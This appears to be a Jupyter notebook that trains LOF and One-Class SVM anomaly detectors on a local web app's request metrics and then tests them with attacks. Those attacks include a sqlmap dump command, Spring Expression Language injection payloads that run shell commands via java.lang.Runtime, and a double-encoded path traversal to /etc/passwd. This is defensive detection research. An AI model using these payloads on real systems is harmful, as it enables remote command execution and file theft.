# Generierung der Testdaten mit legitimen Nutzeranfragen (generate test data with legitimate user requests)
import requests
from pandas.io.json import json_normalize
import matplotlib
import random
import string
from IPython.core.display import HTML
import pandas as pd
import matplotlib.pyplot as plt
import json
# Put the detection system into learning mode and clear previously collected
# data, then generate 1000 legitimate-looking POST requests to /design.
requests.get("http://localhost:5000/start-learning")
requests.get("http://localhost:5000/purge-data")
for _ in range(1000):
    # Random alphanumeric name, 5-49 characters (string.ascii_letters is
    # exactly ascii_lowercase + ascii_uppercase).
    random_name = ''.join(random.choices(string.ascii_letters + string.digits,
                                         k=random.randint(5, 49)))
    requests.post('http://localhost:8080/design',
                  data={'name': random_name,
                        'components': random.choice(['INTELI82', 'INTELI85', '4GB',
                                                     '16GB', '1TB', '512GB', '256GB'])})
# Generierte Daten werden vom Detection System heruntergeladen (download the generated data from the detection system)
# Download the recorded per-function metrics and explore the /design;POST rows.
res = requests.get("http://localhost:5000/getdata-byfunction")
data = res.json()
# pd.json_normalize replaces the deprecated pandas.io.json.json_normalize.
df = pd.json_normalize(data)
df = df.loc[df['function'] == '/design;POST']
df.describe()
df.loc[:, "computer- Total Exec Time"].describe()
df.boxplot(column=['convert- Total Exec Time'], figsize=(5, 25))
df.hist(column=['convert- Total Exec Time'])
df.filter(regex='^(.*Object.*)').boxplot(figsize=(40, 25))
#df.filter(regex='^(.*Counter.*)').hist(figsize=(40,25));
# Count the counter columns that actually vary.
# NOTE(review): the boolean mask comes from df.std() on the whole frame, not
# on the filtered counter columns — confirm the index alignment is intended.
df.filter(regex='^(.*Counter.*)').loc[:, df.std() > 0].shape[1]
# Attack step (run in a shell, not Python): python2 sqlmap.py --wizard -u http://localhost:8080/design --dump
# Re-download the metrics after the sqlmap attack and inspect the same views.
res = requests.get("http://localhost:5000/getdata-byfunction")
data = res.json()
# pd.json_normalize replaces the deprecated pandas.io.json.json_normalize.
df = pd.json_normalize(data)
df = df.loc[df['function'] == '/design;POST']
df.filter(regex='^(.*Object.*)').boxplot(figsize=(40, 25));
# NOTE(review): df.std() mask taken from the unfiltered frame — confirm.
df.filter(regex='^(.*Counter.*)').loc[:, df.std() > 0].shape[1]
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import LocalOutlierFactor
from sklearn.svm import OneClassSVM
import collections
# Restart learning mode with a clean slate and generate 1000 legitimate
# POST requests to /design as training traffic.
requests.get("http://localhost:5000/start-learning")
requests.get("http://localhost:5000/purge-data")
for _ in range(1000):
    random_name = ''.join(random.choices(string.ascii_letters + string.digits,
                                         k=random.randint(5, 49)))
    requests.post('http://localhost:8080/design',
                  data={'name': random_name,
                        'components': random.choice(['INTELI82', 'INTELI85', '4GB',
                                                     '16GB', '1TB', '512GB', '256GB'])})
# Get the recorded data and build the training matrix.
res = requests.get("http://localhost:5000/getdata-byfunction")
data = res.json()
# pd.json_normalize replaces the deprecated pandas.io.json.json_normalize.
df = pd.json_normalize(data)
df = df.fillna(value=0)
df = df[df['function'] == '/design;POST']
# Drop all timing columns; only the remaining (counter/object) features are used.
df = df.filter(regex='^((?!Time).)*$')
# Remember the training feature columns: the exact same set must be used at
# prediction time, otherwise scaler.transform does not work — a changed
# column set is itself an ultimate anomaly sign.
columns = df.columns.drop('function').drop('request')
# Separate out the features and standardize them (zero mean, unit variance).
data = df.loc[:, columns].values
scaler = StandardScaler()
data = scaler.fit_transform(data)

## Train the models ##
# Local Outlier Factor in novelty mode so predict() works on unseen data.
lof = LocalOutlierFactor(algorithm='auto', contamination='auto', novelty=True)
lof.fit(data)
# One-Class SVM with RBF kernel.
ocs = OneClassSVM(kernel="rbf", gamma='scale')
ocs.fit(data)
# Testdaten erstellen und Modell testen (create test data and test the models)
# Generate fresh legitimate traffic and check both models against it.
requests.get("http://localhost:5000/purge-data")
for _ in range(99):
    random_name = ''.join(random.choices(string.ascii_letters + string.digits,
                                         k=random.randint(5, 49)))
    requests.post('http://localhost:8080/design',
                  data={'name': random_name,
                        'components': random.choice(['INTELI82', 'INTELI85', '4GB',
                                                     '16GB', '1TB', '512GB', '256GB'])})

res = requests.get("http://localhost:5000/getdata-byfunction")
data = res.json()
# pd.json_normalize replaces the deprecated pandas.io.json.json_normalize.
df = pd.json_normalize(data)
df = df[df['function'] == '/design;POST']
df = df.filter(regex='^((?!Time).)*$')
# Align with the training feature set: merging with an empty frame adds any
# training columns missing from the new data; fillna turns them into 0.
df = df.merge(pd.DataFrame(columns=columns), how='left')
df = df.fillna(value=0)
data = df.loc[:, columns].values
data = scaler.transform(data)

# For both estimators: -1 = outlier, +1 = inlier.
pred_lof = lof.predict(data)
pred_ocs = ocs.predict(data)
display("Local Outliner Factor:")
display("Outliers: " + str(collections.Counter(pred_lof)[-1]))
display("Non Outliers: " + str(collections.Counter(pred_lof)[1]))
display("One Class SVM:")
display("Outliers: " + str(collections.Counter(pred_ocs)[-1]))
display("Non Outliers: " + str(collections.Counter(pred_ocs)[1]))
# Attack step (run in a shell, not Python): python2 sqlmap.py --wizard -u http://localhost:8080/design --dump
# Fetch the data recorded during the sqlmap attack and check whether the
# trained models flag it as anomalous.
res = requests.get("http://localhost:5000/getdata-byfunction")
data = res.json()
# pd.json_normalize replaces the deprecated pandas.io.json.json_normalize.
df = pd.json_normalize(data)
df = df[df['function'] == '/design;POST']
df = df.filter(regex='^((?!Time).)*$')
# Align with the training feature set (missing training columns become 0).
df = df.merge(pd.DataFrame(columns=columns), how='left')
df = df.fillna(value=0)
data = df.loc[:, columns].values
data = scaler.transform(data)

# For both estimators: -1 = outlier, +1 = inlier.
pred_lof = lof.predict(data)
pred_ocs = ocs.predict(data)
display("Local Outliner Factor:")
display("Outliers: " + str(collections.Counter(pred_lof)[-1]))
display("Non Outliers: " + str(collections.Counter(pred_lof)[1]))
display("One Class SVM:")
display("Outliers: " + str(collections.Counter(pred_ocs)[-1]))
display("Non Outliers: " + str(collections.Counter(pred_ocs)[1]))
# Stop learning mode, send 100 legitimate requests, and inspect what the
# detection system reports as anomalies on live traffic.
requests.get("http://localhost:5000/stop-learning")
for _ in range(100):
    random_name = ''.join(random.choices(string.ascii_letters + string.digits,
                                         k=random.randint(5, 49)))
    requests.post('http://localhost:8080/design',
                  data={'name': random_name,
                        'components': random.choice(['INTELI82', 'INTELI85', '4GB',
                                                     '16GB', '1TB', '512GB', '256GB'])})

# Render the anomaly report, then fetch the raw decision-function values.
req = requests.get("http://localhost:5000/get-new-anomalies")
HTML(req.text)
req = requests.get("http://localhost:5000/get-new-anomalies-data")
data = req.json()
requests.get("http://localhost:5000/purge-predict")

# Histogram of the LOF decision-function scores.
lof_decision_data = data['lof_decision_data']
df = pd.DataFrame(lof_decision_data)
plt.figure(figsize=(12, 6))
plt.hist(df, bins=5);
# Modell trainieren (train the model)
# Clear recorded data, enter learning mode, and generate 2000 legitimate
# JSON POST requests to /entity as training traffic.
requests.get("http://localhost:5000/purge-data")
requests.get("http://localhost:5000/start-learning")
headers = {'content-type': 'application/json'}
for _ in range(2000):
    # Names/attributes may be empty (k can be 0) — this matches the
    # original traffic distribution.
    random_name = ''.join(random.choices(string.ascii_letters + string.digits,
                                         k=random.randint(0, 20)))
    random_attribute = ''.join(random.choices(string.ascii_letters + string.digits,
                                              k=random.randint(0, 20)))
    requests.post('http://localhost:8080/entity',
                  json={'name': random_name, 'attribute': random_attribute},
                  headers=headers)
# Modell testen (test the model)
# Leave learning mode, send 97 legitimate /entity requests, and display the
# resulting anomaly report.
requests.get("http://localhost:5000/stop-learning")
#requests.get("http://localhost:5000/purge-predict")
headers = {'content-type': 'application/json'}
for _ in range(97):
    random_name = ''.join(random.choices(string.ascii_letters + string.digits,
                                         k=random.randint(0, 20)))
    random_attribute = ''.join(random.choices(string.ascii_letters + string.digits,
                                              k=random.randint(0, 20)))
    requests.post('http://localhost:8080/entity',
                  json={'name': random_name, 'attribute': random_attribute},
                  headers=headers)

req = requests.get("http://localhost:5000/get-new-anomalies")
HTML(req.text)
requests.get("http://localhost:5000/purge-predict")
# JSON Patch requests whose 'path' field carries Spring Expression Language
# (SpEL) injection payloads — deliberate attack traffic against /entity to
# exercise the anomaly detector. Payload strings are intentionally malicious
# and must not be altered.
headers = {'content-type': 'application/json-patch+json'}
# Payload 1: T(java.lang.Thread).sleep(1000) — a time-delay probe.
requests.patch('http://localhost:8080/entity/1/', data = json.dumps([{ 'op' : 'replace',
'path' : 'T(java.lang.Thread).sleep(1000).x"',
'value' : 'pwned'}]), headers=headers)
# Payload 2: executes "ifconfig" via java.lang.Runtime and copies its output
# into the HTTP response stream.
requests.patch('http://localhost:8080/entity/1/', data = json.dumps([{ 'op' : 'replace',
'path' : 'T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec("ifconfig").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x',
'value' : 'pwned'}]), headers=headers)
# Payload 3: same technique executing "df -h".
requests.patch('http://localhost:8080/entity/1/', data = json.dumps([{ 'op' : 'replace',
'path' : 'T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec("df -h").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x',
'value' : 'pwned'}]), headers=headers)
# Check whether the SpEL-injection requests were flagged as anomalies.
req = requests.get("http://localhost:5000/get-new-anomalies")
HTML(req.text)
# Repeat the "df -h" SpEL payload and render the raw HTTP response this time.
headers = {'content-type': 'application/json-patch+json'}
req = requests.patch('http://localhost:8080/entity/1/', data = json.dumps([{ 'op' : 'replace',
'path' : 'T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec("df -h").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x',
'value' : 'pwned'}]), headers=headers)
HTML(req.text)
requests.get("http://localhost:5000/purge-predict")
# Path-traversal attack: double-URL-encoded "../" sequences (%252f decodes
# to %2f, then to /) targeting /etc/passwd, then check the anomaly report.
req = requests.get("http://localhost:8080/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd")
HTML(req.text)
req = requests.get("http://localhost:5000/get-new-anomalies")
HTML(req.text)
# Re-train on 1000 legitimate requests, then estimate the false-positive rate:
# 100 rounds of 100 legitimate requests each, recording the reported outlier
# count per round and summarizing the distribution.
requests.get("http://localhost:5000/start-learning")
requests.get("http://localhost:5000/purge-data")
for _ in range(1000):
    random_name = ''.join(random.choices(string.ascii_letters + string.digits,
                                         k=random.randint(5, 49)))
    requests.post('http://localhost:8080/design',
                  data={'name': random_name,
                        'components': random.choice(['INTELI82', 'INTELI85', '4GB',
                                                     '16GB', '1TB', '512GB', '256GB'])})
requests.get("http://localhost:5000/stop-learning")

outliers = list()
for _ in range(100):
    for _ in range(100):
        random_name = ''.join(random.choices(string.ascii_letters + string.digits,
                                             k=random.randint(5, 49)))
        requests.post('http://localhost:8080/design',
                      data={'name': random_name,
                            'components': random.choice(['INTELI82', 'INTELI85', '4GB',
                                                         '16GB', '1TB', '512GB', '256GB'])})
    # Parse the outlier count out of the HTML status page, then reset the
    # prediction buffer for the next round.
    req = requests.get("http://localhost:5000/get-new-anomalies")
    outliers.append(int(req.text.split('Outliers: ')[1].split('<')[0]))
    requests.get("http://localhost:5000/purge-predict")

df = pd.DataFrame(outliers)
display(df.min())
display(df.max())
df.mean()
df.describe()